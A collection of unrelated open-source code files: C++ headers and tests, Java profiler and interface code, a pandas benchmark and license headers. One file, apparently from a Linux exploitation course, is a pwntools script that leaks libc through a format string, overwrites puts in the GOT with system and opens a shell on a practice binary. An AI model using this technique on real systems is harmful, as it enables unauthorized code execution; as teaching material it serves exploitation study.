DISCARDMODE_LAST; mode++) addChild(makeDiscardCase(m_context, (DiscardTemplate)tmpl, (DiscardMode)mode)); } } // Functional } // gles2 } // deqp
4,850
4,537
<filename>3rdparty/stout/include/stout/os/windows/mktemp.hpp // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. #ifndef __STOUT_OS_WINDOWS_MKTEMP_HPP__ #define __STOUT_OS_WINDOWS_MKTEMP_HPP__ #include <string> #include <vector> #include <stout/error.hpp> #include <stout/path.hpp> #include <stout/stringify.hpp> #include <stout/try.hpp> #include <stout/windows.hpp> #include <stout/os/close.hpp> #include <stout/os/int_fd.hpp> #include <stout/os/open.hpp> #include <stout/os/temp.hpp> #include <stout/internal/windows/longpath.hpp> namespace os { // Creates a temporary file using the specified path template. The // template may be any path with _6_ `Xs' appended to it, for example // /tmp/temp.XXXXXX. The trailing `Xs' are replaced with a unique // alphanumeric combination. inline Try<std::string> mktemp( const std::string& path = path::join(os::temp(), "XXXXXX")) { const std::wstring longpath = ::internal::windows::longpath(path); std::vector<wchar_t> buffer(longpath.begin(), longpath.end()); // The range does not include the null terminator, needed to reconstruct // the next string. buffer.push_back(L'\0'); // NOTE: in the POSIX spec, `mkstemp` will generate a random filename from // the `path` template, `open` that filename, and return the resulting file // descriptor. On Windows, `_mktemp_s` will actually only generate the path, // so here we actually have to call `open` ourselves to get a file descriptor // we can return as a result. 
if (::_wmktemp_s(buffer.data(), buffer.size()) != 0) { return WindowsError(); } const std::string temp_file = stringify(std::wstring(buffer.data())); // NOTE: We open the file with read/write access for the given user, an // attempt to match POSIX's specification of `mkstemp`. We use `_S_IREAD` and // `_S_IWRITE` here instead of the POSIX equivalents. On Windows the file is // is not present, we use `_O_CREAT` option when opening the file. Try<int_fd> fd = os::open(temp_file, O_RDWR | O_CREAT | O_EXCL, _S_IREAD | _S_IWRITE); if (fd.isError()) { return Error(fd.error()); } // We ignore the return value of close(). This is because users // calling this function are interested in the return value of // mkstemp(). Also an unsuccessful close() doesn't affect the file. os::close(fd.get()); return strings::remove(temp_file, os::LONGPATH_PREFIX, strings::Mode::PREFIX); } } // namespace os { #endif // __STOUT_OS_WINDOWS_MKTEMP_HPP__
972
880
/** * Copyright 2019 <NAME> * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package ch.qos.logback.core.sift; import ch.qos.logback.core.spi.LifeCycle; /** * Implement this interface in order to compute a discriminating value for a * given event of type &lt;E&gt;. * * <p>The returned value can depend on any data available at the time of the * call, including data contained within the currently running thread. * * @author <NAME>; * * @param <E> */ public interface Discriminator<E> extends LifeCycle { /** * Given event 'e' return a discriminating value. * * @param e event to evaluate * @return discriminating value */ String getDiscriminatingValue(E e); /** * The key or variable name under which the discriminating value should be * exported into the host environment. * * @return key or name */ String getKey(); }
404
580
<filename>test/alignment.cpp // DynaMix // Copyright (c) 2013-2019 <NAME>, <NAME> // // Distributed under the MIT Software License // See accompanying file LICENSE.txt or copy at // https://opensource.org/licenses/MIT // #include <dynamix/core.hpp> #include <dynamix/allocators.hpp> #include "doctest/doctest.h" TEST_SUITE_BEGIN("align"); using namespace dynamix; TEST_CASE("sub_ptr_align") { size_t ptr_size = sizeof(uintptr_t); for(size_t i=1; i<=ptr_size; ++i) { CHECK(2 * ptr_size == domain_allocator::mem_size_for_mixin(i, 1)); } for(size_t i=2; i<=ptr_size; i+=2) { CHECK(2 * ptr_size == domain_allocator::mem_size_for_mixin(i, 2)); } } DYNAMIX_DECLARE_MIXIN(align_default); DYNAMIX_DECLARE_MIXIN(align_8); DYNAMIX_DECLARE_MIXIN(align_16); DYNAMIX_DECLARE_MIXIN(align_32); DYNAMIX_MULTICAST_MESSAGE_0(void, check_alignment); TEST_CASE("aligned_mixin") { object o; mutate(o) .add<align_default>() .add<align_8>() .add<align_16>() .add<align_32>(); CHECK(intptr_t(o.get<align_8>()) % 8 == 0); CHECK(intptr_t(o.get<align_16>()) % 16 == 0); CHECK(intptr_t(o.get<align_32>()) % 32 == 0); check_alignment(o); } TEST_SUITE_END(); class align_default { public: void check_alignment() { CHECK(intptr_t(this) % std::alignment_of<align_default>::value == 0); } }; #if defined _MSC_VER # define ALIGN(n) __declspec(align(n)) #else # define ALIGN(n) __attribute__((aligned(n))) #endif class ALIGN(8) align_8 { public: void check_alignment() { CHECK(intptr_t(this) % 8 == 0); } }; class ALIGN(16) align_16 { public: void check_alignment() { CHECK(intptr_t(this) % 16 == 0); } }; class ALIGN(32) align_32 { public: void check_alignment() { CHECK(intptr_t(this) % 32 == 0); } }; DYNAMIX_DEFINE_MIXIN(align_default, check_alignment_msg); DYNAMIX_DEFINE_MIXIN(align_8, check_alignment_msg); DYNAMIX_DEFINE_MIXIN(align_16, check_alignment_msg); DYNAMIX_DEFINE_MIXIN(align_32, check_alignment_msg); DYNAMIX_DEFINE_MESSAGE(check_alignment);
1,042
319
/* * Copyright (c) 2014, Regents of the University of California * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * 1. Redistributions of source code must retain the above copyright notice, this * list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR * ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
*/ package edu.uci.python.profiler; import java.io.*; import java.util.*; import java.util.Map.Entry; import com.oracle.truffle.api.*; import com.oracle.truffle.api.nodes.*; import edu.uci.python.nodes.*; import edu.uci.python.nodes.argument.*; import edu.uci.python.nodes.call.*; import edu.uci.python.nodes.call.CallDispatchBoxedNode.LinkedDispatchBoxedNode; import edu.uci.python.nodes.call.CallDispatchUnboxedNode.LinkedDispatchUnboxedNode; import edu.uci.python.nodes.call.PythonCallNode.BoxedCallNode; import edu.uci.python.nodes.call.PythonCallNode.CallConstructorNode; import edu.uci.python.nodes.call.PythonCallNode.UnboxedCallNode; import edu.uci.python.nodes.control.*; import edu.uci.python.nodes.control.LoopNode; import edu.uci.python.nodes.function.*; import edu.uci.python.runtime.*; /** * @author Gulfem */ public class ProfilerResultPrinter { private PrintStream out = System.out; private PythonProfilerNodeProber profilerProber; private List<PNode> nodesEmptySourceSections = new ArrayList<>(); private List<PNode> nodesUsingExistingProbes = new ArrayList<>(); private final PythonParseResult parseResult; public ProfilerResultPrinter(PythonProfilerNodeProber profilerProber, PythonParseResult parseResult) { this.profilerProber = profilerProber; this.parseResult = parseResult; } private static long excludedTime = 0; private static long totalCounter = 0; private static long cumulativeTime = 0; public void printCallProfilerResults() { List<MethodBodyInstrument> methodBodyInstruments = profilerProber.getMethodBodyInstruments(); Map<MethodBodyInstrument, List<Long>> timeMap = new HashMap<>(); if (methodBodyInstruments.size() > 0) { printBanner("Call Time Profiling Results", 116); /** * 50 is the length of the text by default padding left padding is added, so space is * added to the beginning of the string, minus sign adds padding to the right */ out.format("%-40s", "Function Name"); out.format("%-20s", "Counter"); out.format("%-20s", "Excluded Time"); 
out.format("%-20s", "Avg Excluded"); out.format("%-20s", "Cumulative Time"); out.format("%-20s", "Avg Cumulative"); out.format("%-9s", "Line"); out.format("%-11s", "Column"); out.println(); out.println("=============== =============== =============== =============== =============== =============== ==== ======"); excludedTime = 0; for (MethodBodyInstrument methodBodyInstrument : methodBodyInstruments) { Node methodBody = methodBodyInstrument.getNode(); totalCounter = 0; cumulativeTime = 0; getCumulativeCounterTime(methodBodyInstrument); if (totalCounter > 0) { if (methodBody instanceof ReturnTargetNode) { getExcludedTime(methodBody, methodBodyInstrument); } else { excludedTime = cumulativeTime; } List<Long> times = new ArrayList<>(); times.add(totalCounter); times.add(excludedTime); times.add(cumulativeTime); timeMap.put(methodBodyInstrument, times); } } printTime(timeMap); } } private void getCumulativeCounterTime(MethodBodyInstrument methodBodyInstrument) { ModuleNode moduleNode = (ModuleNode) parseResult.getModuleRoot(); Node moduleBody = moduleNode.getBody(); traverseBody(moduleBody, methodBodyInstrument); for (RootNode functionRoot : parseResult.getFunctionRoots()) { if (functionRoot instanceof FunctionRootNode) { Node methodBody = ((FunctionRootNode) functionRoot).getBody(); traverseBody(methodBody, methodBodyInstrument); } } } private static void traverseBody(Node methodBody, MethodBodyInstrument methodBodyInstrument) { methodBody.accept(new NodeVisitor() { public boolean visit(Node node) { if (node instanceof BoxedCallNode || node instanceof CallConstructorNode || node instanceof UnboxedCallNode) { CallDispatchNode callDispatchNode = null; if (node instanceof BoxedCallNode) { callDispatchNode = ((BoxedCallNode) node).getDispatchNode(); } else if (node instanceof CallConstructorNode) { callDispatchNode = ((CallConstructorNode) node).getDispatchNode(); } else if (node instanceof UnboxedCallNode) { callDispatchNode = ((UnboxedCallNode) node).getDispatchNode(); 
} if (node.getParent() instanceof PythonWrapperNode) { PythonWrapperNode callWrapper = (PythonWrapperNode) node.getParent(); Node callProbe = (Node) callWrapper.getProbe(); TimeProfilerInstrument subCallInstrument = (TimeProfilerInstrument) callProbe.getChildren().iterator().next(); DirectCallNode callNode = null; if (callDispatchNode instanceof LinkedDispatchBoxedNode) { LinkedDispatchBoxedNode linkDispatchNode = (LinkedDispatchBoxedNode) callDispatchNode; callNode = linkDispatchNode.getInvokeNode().getDirectCallNode(); } else if (callDispatchNode instanceof LinkedDispatchUnboxedNode) { LinkedDispatchUnboxedNode linkUnboxedDispatchNode = (LinkedDispatchUnboxedNode) callDispatchNode; callNode = linkUnboxedDispatchNode.getInvokeNode().getDirectCallNode(); } if (callNode != null) { RootCallTarget callTarget = (RootCallTarget) callNode.getCallTarget(); PythonWrapperNode wrapper = null; if (callTarget.getRootNode() instanceof FunctionRootNode) { FunctionRootNode childRootNode = (FunctionRootNode) callTarget.getRootNode(); wrapper = (PythonWrapperNode) childRootNode.getBody(); } else if (callTarget.getRootNode() instanceof BuiltinFunctionRootNode) { BuiltinFunctionRootNode childRootNode = (BuiltinFunctionRootNode) callTarget.getRootNode(); if (childRootNode.getBody() instanceof PythonWrapperNode) { wrapper = (PythonWrapperNode) childRootNode.getBody(); } } if (wrapper != null) { Node probe = (Node) wrapper.getProbe(); MethodBodyInstrument currentMethodBodyInstrument = (MethodBodyInstrument) probe.getChildren().iterator().next(); if (currentMethodBodyInstrument.equals(methodBodyInstrument)) { totalCounter = totalCounter + subCallInstrument.getCounter(); cumulativeTime = cumulativeTime + subCallInstrument.getTime(); } } } } } return true; } }); } public void getExcludedTime(Node methodBody, MethodBodyInstrument methodBodyInstrument) { excludedTime = cumulativeTime; methodBody.accept(new NodeVisitor() { public boolean visit(Node node) { if (node instanceof BoxedCallNode) { 
PythonWrapperNode callWrapper = (PythonWrapperNode) node.getParent(); if (!(callWrapper.getParent() instanceof ArgumentsNode)) { Node callProbe = (Node) callWrapper.getProbe(); TimeProfilerInstrument subCallInstrument = (TimeProfilerInstrument) callProbe.getChildren().iterator().next(); BoxedCallNode boxedCallNode = (BoxedCallNode) node; CallDispatchNode callDispatchNode = boxedCallNode.getDispatchNode(); if (callDispatchNode instanceof LinkedDispatchBoxedNode) { LinkedDispatchBoxedNode linkDispatchNode = (LinkedDispatchBoxedNode) callDispatchNode; DirectCallNode callNode = linkDispatchNode.getInvokeNode().getDirectCallNode(); RootCallTarget callTarget = (RootCallTarget) callNode.getCallTarget(); PythonWrapperNode wrapper = null; if (callTarget.getRootNode() instanceof FunctionRootNode) { FunctionRootNode childRootNode = (FunctionRootNode) callTarget.getRootNode(); wrapper = (PythonWrapperNode) childRootNode.getBody(); } else if (callTarget.getRootNode() instanceof BuiltinFunctionRootNode) { BuiltinFunctionRootNode childRootNode = (BuiltinFunctionRootNode) callTarget.getRootNode(); if (childRootNode.getBody() instanceof PythonWrapperNode) { wrapper = (PythonWrapperNode) childRootNode.getBody(); } } if (wrapper != null) { Node probe = (Node) wrapper.getProbe(); MethodBodyInstrument currentMethodBodyInstrument = (MethodBodyInstrument) probe.getChildren().iterator().next(); /** * Do not exclude recursive calls */ if (!methodBodyInstrument.equals(currentMethodBodyInstrument)) { excludedTime = excludedTime - subCallInstrument.getTime(); } } } } } return true; } }); } private void printTime(Map<MethodBodyInstrument, List<Long>> timesMap) { Map<MethodBodyInstrument, List<Long>> sortedTimesMap; if (PythonOptions.SortProfilerResults) { sortedTimesMap = sortTimeProfilerResults(timesMap); } else { sortedTimesMap = timesMap; } long totalCalls = 0; for (Map.Entry<MethodBodyInstrument, List<Long>> entry : sortedTimesMap.entrySet()) { MethodBodyInstrument methodBodyInstrument = 
entry.getKey(); Node methodBody = methodBodyInstrument.getNode(); String methodName = null; if (methodBody instanceof ReturnTargetNode) { methodName = ((FunctionRootNode) methodBody.getRootNode()).getFunctionName(); } else if (methodBody instanceof PythonBuiltinNode) { methodName = ((BuiltinFunctionRootNode) methodBody.getRootNode()).getFunctionName(); } List<Long> times = entry.getValue(); long counter = times.get(0); long excluded = times.get(1); long cumulative = times.get(2); out.format("%-40s", methodName); out.format("%15s", counter); totalCalls = totalCalls + counter; out.format("%20s", (excluded / 1000000000)); out.format("%20s", ((excluded / counter) / 1000000000)); out.format("%20s", (cumulative / 1000000000)); out.format("%20s", ((cumulative / counter) / 1000000000)); if (methodBody instanceof ReturnTargetNode) { out.format("%9s", methodBody.getSourceSection().getStartLine()); out.format("%11s", methodBody.getSourceSection().getStartColumn()); } else { out.format("%9s", "-"); out.format("%11s", "-"); } out.println(); } out.println("Total number of executed calls: " + totalCalls); } public void printControlFlowProfilerResults() { long totalCount = 0; totalCount += printLoopProfilerResults(); totalCount += printIfProfilerResults(); totalCount += printBreakContinueProfilerResults(); out.println("Total number of executed control flow instruments: " + totalCount); } private long printLoopProfilerResults() { long totalCount = 0; List<ProfilerInstrument> loopInstruments = getInstruments(profilerProber.getLoopInstruments()); if (loopInstruments.size() > 0) { printCaption("Loop Profiling Results"); for (ProfilerInstrument instrument : loopInstruments) { if (instrument.getCounter() > 0) { Node node = instrument.getNode(); Node loopNode = node.getParent().getParent(); if (loopNode instanceof LoopNode) { /** * During generator optimizations for node is replaced with * PeeledGeneratorLoopNode. 
Since the for loop is replaced, it's better not * to print the result of this specific for profiling. * */ printProfilerResult(loopNode, instrument.getCounter()); totalCount = totalCount + instrument.getCounter(); } } } out.println("Total number of executed instruments: " + totalCount); } return totalCount; } private long printIfProfilerResults() { long totalCount = 0; Map<ProfilerInstrument, List<ProfilerInstrument>> ifInstruments; if (PythonOptions.SortProfilerResults) { ifInstruments = sortIfProfilerResults(profilerProber.getIfInstruments()); } else { ifInstruments = profilerProber.getIfInstruments(); } if (ifInstruments.size() > 0) { printBanner("If Node Profiling Results", 116); out.format("%-20s", "If Counter"); out.format("%-18s", "Then Counter"); out.format("%-18s", "Else Counter"); out.format("%-9s", "Line"); out.format("%-11s", "Column"); out.format("%-70s", "In Method"); out.println(); out.println("=========== ============ ============= ==== ====== ========================================"); Iterator<Map.Entry<ProfilerInstrument, List<ProfilerInstrument>>> it = ifInstruments.entrySet().iterator(); while (it.hasNext()) { Entry<ProfilerInstrument, List<ProfilerInstrument>> entry = it.next(); ProfilerInstrument ifInstrument = entry.getKey(); if (ifInstrument.getCounter() > 0) { List<ProfilerInstrument> instruments = entry.getValue(); ProfilerInstrument thenInstrument = instruments.get(0); out.format("%11s", ifInstrument.getCounter()); out.format("%21s", thenInstrument.getCounter()); totalCount = totalCount + ifInstrument.getCounter(); totalCount = totalCount + thenInstrument.getCounter(); if (instruments.size() == 1) { out.format("%19s", "-"); } else if (instruments.size() == 2) { ProfilerInstrument elseInstrument = instruments.get(1); out.format("%19s", elseInstrument.getCounter()); totalCount = totalCount + elseInstrument.getCounter(); } Node ifNode = ifInstrument.getNode(); out.format("%9s", ifNode.getSourceSection().getStartLine()); out.format("%11s", 
ifNode.getSourceSection().getStartColumn()); out.format("%5s", ""); out.format("%-70s", ifNode.getRootNode()); out.println(); } } out.println("Total number of executed instruments: " + totalCount); } return totalCount; } private long printBreakContinueProfilerResults() { return printProfilerResults("Break Continue Profiling Results", getInstruments(profilerProber.getBreakContinueInstruments())); } public void printVariableAccessProfilerResults() { if (PythonOptions.ProfileTypeDistribution) { printProfilerTypeDistributionResults("Variable Access Profiling Results", profilerProber.getVariableAccessTypeDistributionInstruments()); } else { printProfilerResults("Variable Access Profiling Results", getInstruments(profilerProber.getVariableAccessInstruments())); } } public void printOperationProfilerResults() { if (PythonOptions.ProfileTypeDistribution) { printProfilerTypeDistributionResults("Operation Profiling Results", profilerProber.getOperationTypeDistributionInstruments()); } else { printProfilerResults("Operation Profiling Results", getInstruments(profilerProber.getOperationInstruments())); } } public void printCollectionOperationsProfilerResults() { printProfilerResults("Collection Operations Profiling Results", getInstruments(profilerProber.getCollectionOperationsInstruments())); } private static List<ProfilerInstrument> getInstruments(List<ProfilerInstrument> instruments) { if (PythonOptions.SortProfilerResults) { List<ProfilerInstrument> sortedInstruments = sortProfilerResult(instruments); return sortedInstruments; } return instruments; } private long printProfilerResults(String caption, List<ProfilerInstrument> instruments) { long totalCount = 0; if (instruments.size() > 0) { printCaption(caption); for (ProfilerInstrument instrument : instruments) { if (instrument.getCounter() > 0) { Node node = instrument.getNode(); printProfilerResult(node, instrument.getCounter()); totalCount = totalCount + instrument.getCounter(); } } out.println("Total number of executed 
instruments: " + totalCount); } return totalCount; } private void printProfilerTypeDistributionResults(String caption, List<TypeDistributionProfilerInstrument> instruments) { long totalCount = 0; if (instruments.size() > 0) { printBanner(caption, 140); out.format("%-50s", "Node"); out.format("%-20s", "Counter"); out.format("%-9s", "Line"); out.format("%-11s", "Column"); out.format("%-70s", "In Method"); out.println(); out.println("============= =============== ==== ====== =================================================="); for (TypeDistributionProfilerInstrument profilerInstrument : instruments) { Map<Class<? extends Node>, Counter> types = profilerInstrument.getTypes(); if (types.isEmpty()) { Node initialNode = profilerInstrument.getInitialNode(); Node onlyNode = profilerInstrument.getOnlyNode(); long counter = profilerInstrument.getOnlyCounter(); Class<? extends Node> nodeClass = onlyNode.getClass(); totalCount = totalCount + counter; out.format("%-50s", nodeClass.getSimpleName()); out.format("%15s", counter); out.format("%9s", initialNode.getSourceSection().getStartLine()); out.format("%11s", initialNode.getSourceSection().getStartColumn()); out.format("%5s", ""); out.format("%-70s", initialNode.getRootNode()); out.println(); } else { Iterator<Map.Entry<Class<? extends Node>, Counter>> it = types.entrySet().iterator(); out.println(); while (it.hasNext()) { Entry<Class<? extends Node>, Counter> entry = it.next(); Node initialNode = profilerInstrument.getInitialNode(); Class<? 
extends Node> nodeClass = entry.getKey(); long counter = entry.getValue().getCounter(); totalCount = totalCount + counter; out.format("%-50s", nodeClass.getSimpleName()); out.format("%15s", counter); out.format("%9s", initialNode.getSourceSection().getStartLine()); out.format("%11s", initialNode.getSourceSection().getStartColumn()); out.format("%5s", ""); out.format("%-70s", initialNode.getRootNode()); out.println(); } out.println(); } } out.println("Total number of executed instruments: " + totalCount); } } private void printCaption(String caption) { printBanner(caption, 116); out.format("%-25s", "Node"); out.format("%-20s", "Counter"); out.format("%-9s", "Line"); out.format("%-11s", "Column"); out.format("%-70s", "In Method"); out.println(); out.println("============= =============== ==== ====== ==================================================="); } private void printProfilerResult(Node node, long counter) { String nodeName = getShortName(node); out.format("%-25s", nodeName); out.format("%15s", counter); out.format("%9s", node.getSourceSection().getStartLine()); out.format("%11s", node.getSourceSection().getStartColumn()); out.format("%11s", node.getSourceSection().getCharLength()); out.format("%5s", ""); out.format("%-70s", node.getRootNode()); out.println(); } private static String getShortName(Node node) { NodeInfo nodeInfo = node.getClass().getAnnotation(NodeInfo.class); if (nodeInfo == null) { nodeInfo = node.getClass().getSuperclass().getAnnotation(NodeInfo.class); } else if (nodeInfo.shortName().equals("")) { nodeInfo = node.getClass().getSuperclass().getAnnotation(NodeInfo.class); } if (nodeInfo != null) { return nodeInfo.shortName(); } else { throw new RuntimeException("Short name is missing in " + node); } } private static List<ProfilerInstrument> sortProfilerResult(List<ProfilerInstrument> list) { Collections.sort(list, new Comparator<ProfilerInstrument>() { @Override public int compare(final ProfilerInstrument profiler1, final ProfilerInstrument 
profiler2) { return Long.compare(profiler2.getCounter(), profiler1.getCounter()); } }); return list; } private static Map<ProfilerInstrument, List<ProfilerInstrument>> sortIfProfilerResults(Map<ProfilerInstrument, List<ProfilerInstrument>> map) { List<Map.Entry<ProfilerInstrument, List<ProfilerInstrument>>> list = new LinkedList<>(map.entrySet()); Collections.sort(list, new Comparator<Map.Entry<ProfilerInstrument, List<ProfilerInstrument>>>() { public int compare(Map.Entry<ProfilerInstrument, List<ProfilerInstrument>> if1, Map.Entry<ProfilerInstrument, List<ProfilerInstrument>> if2) { return Long.compare(if2.getKey().getCounter(), if1.getKey().getCounter()); } }); Map<ProfilerInstrument, List<ProfilerInstrument>> result = new LinkedHashMap<>(); for (Map.Entry<ProfilerInstrument, List<ProfilerInstrument>> entry : list) { result.put(entry.getKey(), entry.getValue()); } return result; } private static Map<MethodBodyInstrument, List<Long>> sortTimeProfilerResults(Map<MethodBodyInstrument, List<Long>> map) { List<Map.Entry<MethodBodyInstrument, List<Long>>> list = new LinkedList<>(map.entrySet()); Collections.sort(list, new Comparator<Map.Entry<MethodBodyInstrument, List<Long>>>() { public int compare(Map.Entry<MethodBodyInstrument, List<Long>> if1, Map.Entry<MethodBodyInstrument, List<Long>> if2) { return Long.compare(if2.getValue().get(0).longValue(), if1.getValue().get(0).longValue()); } }); Map<MethodBodyInstrument, List<Long>> result = new LinkedHashMap<>(); for (Map.Entry<MethodBodyInstrument, List<Long>> entry : list) { result.put(entry.getKey(), entry.getValue()); } return result; } public void addNodeEmptySourceSection(PNode node) { nodesEmptySourceSections.add(node); } public void addNodeUsingExistingProbe(PNode node) { nodesUsingExistingProbes.add(node); } public void printNodesEmptySourceSections() { if (nodesEmptySourceSections.size() > 0) { printBanner("Nodes That Have Empty Source Sections", 10); for (PNode node : nodesEmptySourceSections) { 
out.println(node.getClass().getSimpleName() + " in " + node.getRootNode()); } } } public void printNodesUsingExistingProbes() { if (nodesUsingExistingProbes.size() > 0) { printBanner("Nodes That Reuses an Existing Probe", 10); for (PNode node : nodesUsingExistingProbes) { out.println(node.getClass().getSimpleName() + " in " + node.getRootNode()); } } } private void printBanner(String caption, int size) { // CheckStyle: stop system..print check int bannerSize = size - caption.length() - 2; for (int i = 0; i < bannerSize / 2; i++) { out.print("="); } out.print(" " + caption + " "); for (int i = 0; i < (bannerSize - (bannerSize / 2)); i++) { out.print("="); } out.println(); // CheckStyle: resume system..print check } }
12,771
907
<reponame>h4ck3rb0b/linux-exploitation-course from pwn import * #context.log_level = "debug" printf_got = 0x804b00c puts_got = 0x0804b01c system_libc_offset = 0x40310 printf_libc_offset = 0x4d410 def main(): # p = process("./diapers") p = remote("localhost", 1343) p.recv(0x60) # Read the menu log.info("Selecting overflowable brand") p.sendline("3") # Send 3 p.recv(0x3d) # Read the options log.info("Decrementing volume...") # Trigger the overflow condition for i in range(257): p.sendline("1") p.recv(0x200) log.info("Overflowable") ### Leak the GOT addresses ### # Write to format string member p.sendline("0") # Payload payload = "A"*15 + p32(printf_got) + "::%18$s::" payload = payload.ljust(108, ".") p.send(payload) p.recvrepeat(0.4) # Trigger the leak to get the dynamic address of strlen p.sendline("2") leak = p.recvrepeat(0.4) delim_index = leak.index("::") + 2 printf_address = u32(leak[delim_index:delim_index+4]) log.info("Got leak to printf: 0x%x" % printf_address) # Calculate libc base libc_base = printf_address - printf_libc_offset log.info("libc Base: 0x%x" % libc_base) # Calculate system address system_address = libc_base + system_libc_offset log.info("System Address: 0x%x" % system_address) ### Perform the Exploitation Overwrite ### # Write to format string member p.sendline("0") # Payload fmt = fmtstr_payload(18, {puts_got: system_address}) payload = "A"*11 + "\x00"*4 + fmt payload = payload.ljust(108, "\x00") p.send(payload) p.recv(0x500) # Trigger the overwrite and get shell p.sendline("2") p.sendline("!sh") # Cause of the ed p.recvrepeat(0.4) log.success("Enjoy your shell") p.interactive() if __name__ == "__main__": main()
808
746
<gh_stars>100-1000 package org.protege.editor.owl.model.selection.ontologies; import org.semanticweb.owlapi.model.OWLOntology; import java.util.Set; /** * Author: drummond<br> * http://www.cs.man.ac.uk/~drummond/<br><br> * The University Of Manchester<br> * Bio Health Informatics Group<br> * Date: Jun 6, 2008<br><br> */ public interface OntologySelectionStrategy { Set<OWLOntology> getOntologies(); String getName(); }
162
2,392
// Copyright (C) 2014-2018 GeometryFactory Sarl // // This file is part of CGAL (www.cgal.org) // // $URL: https://github.com/CGAL/cgal/blob/v5.1/Installation/include/CGAL/Surface_mesh/Surface_mesh_fwd.h $ // $Id: Surface_mesh_fwd.h 8bb22d5 2020-03-26T14:23:37+01:00 <NAME> // SPDX-License-Identifier: LGPL-3.0-or-later OR LicenseRef-Commercial // #ifndef CGAL_SURFACE_MESH_FWD_H #define CGAL_SURFACE_MESH_FWD_H /// \file Surface_mesh_fwd.h /// Forward declarations of the Surface_mesh package. #ifndef DOXYGEN_RUNNING namespace CGAL { // fwdS for the public interface template<typename P> class Surface_mesh; } // CGAL #endif #endif /* CGAL_SURFACE_MESH_FWD_H */
286
331
<filename>benchmarks/Pandas/run.py #!/usr/bin/env python from __future__ import division, print_function import pandas as pd import time test_file = "test_01.csv" def run_timed(name, func, numRepeats=3): runtimes = [] for i in xrange(numRepeats): print("\n *** Running {} [Iteration: {}]".format(name, i+1)) t1 = time.time() func() t2 = time.time() runtimes.append(t2 - t1) runtimes = pd.Series(runtimes) return "{:<40s} min: {:6.3f} mean: {:6.3f} max: {:6.3f}".format( name, runtimes.min(), runtimes.mean(), runtimes.max() ) def test_count_python(): count = 0 for _ in open(test_file).readlines(): count += 1 print(count) def test_count_pandas(): df = pd.read_csv(test_file, header=None, names=["A", "B", "C", "D"]) print(len(df)) def test_column_averages(): df = pd.read_csv(test_file, header=None, names=["A", "B", "C", "D"]) meanA = df.A.mean() meanB = df.B.mean() meanC = df.C.mean() meanD = df.D.mean() print(meanA, meanB, meanC, meanD) def test_unique_values1(): df = pd.read_csv(test_file, header=None, names=["A", "B", "C", "D"]) count = df.C.nunique() print(count) def test_unique_values2(): df = pd.read_csv(test_file, header=None, names=["A", "B", "C", "D"]) count = len(df[["C", "D"]].drop_duplicates()) print(count) def test_join(): df_a = pd.read_csv("test_02_a.csv", header=None, names=["K1", "K2", "K3", "valA"]) df_b = pd.read_csv("test_02_b.csv", header=None, names=["K1", "K2", "K3", "valB"]) joined = df_a.merge(df_b, on=["K1", "K2", "K3"]) mean_diff = (joined["valA"] - joined["valB"]).mean() print(mean_diff) result_strings = [ run_timed( "Count (no parsing, pure Python)", test_count_python ), run_timed( "Count (Pandas)", test_count_pandas ), run_timed( "Column averages", test_column_averages ), run_timed( "Unique values 1", test_unique_values1 ), run_timed( "Unique values 2", test_unique_values2 ), run_timed( "Join", test_join ), ] print("\n *** Summary:") print("\n".join(result_strings))
1,111
2,542
// ------------------------------------------------------------ // Copyright (c) Microsoft Corporation. All rights reserved. // Licensed under the MIT License (MIT). See License.txt in the repo root for license information. // ------------------------------------------------------------ #pragma once namespace Reliability { namespace ReconfigurationAgentComponent { namespace Infrastructure { // Represents a time based throttle class IThrottle { public: // Return the number of elements that would cause the throttle to be hit virtual int GetCount(Common::StopwatchTime now) = 0; // Tell the throttle that 'count' elements happened at a particular time virtual void Update(int count, Common::StopwatchTime now) = 0; virtual ~IThrottle() {} }; } } }
354
1,615
<reponame>NVIDIAGameWorks/Falcor /*************************************************************************** # Copyright (c) 2015-21, NVIDIA CORPORATION. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # * Neither the name of NVIDIA CORPORATION nor the names of its # contributors may be used to endorse or promote products derived # from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS "AS IS" AND ANY # EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE 